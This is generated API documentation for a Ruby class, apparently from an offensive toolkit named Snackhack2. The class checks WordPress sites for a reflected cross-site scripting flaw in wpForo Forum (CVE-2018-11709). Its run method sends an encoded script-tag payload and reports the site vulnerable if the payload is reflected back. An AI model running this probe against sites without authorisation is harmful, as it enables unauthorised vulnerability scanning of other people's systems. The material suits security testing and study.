Class: Snackhack2::WPForoForum

Inherits:

Object

Object
Snackhack2::WPForoForum

show all

Defined in:: lib/snackhack2/wpForo_Forum.rb

Instance Attribute Summary collapse

#site ⇒ Object

Returns the value of attribute site.

Instance Method Summary collapse

#initialize ⇒ WPForoForum constructor

A new instance of WPForoForum.
#run ⇒ Object

wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) source: github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709.

Constructor Details

#initialize ⇒ `WPForoForum`

Returns a new instance of WPForoForum.



7
8
9

# File 'lib/snackhack2/wpForo_Forum.rb', line 7

def initialize
  @site = site
end

Instance Attribute Details

#site ⇒ `Object`

Returns the value of attribute site.



6
7
8

# File 'lib/snackhack2/wpForo_Forum.rb', line 6

def site
  @site
end

Instance Method Details

#run ⇒ `Object`

wpForo Forum <= 1.4.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) source: github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2018-11709

# File 'lib/snackhack2/wpForo_Forum.rb', line 13

def run
  wp = HTTParty.get(File.join(@site, '/index.php/community/?%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E'))
  if wp.code == 200
    puts "[+] #{@site} is vulnerable to CVE-2018-11709..." if wp.match(/XSS/)
  else
    puts "[+] HTTP code #{wp.code}"
  end
end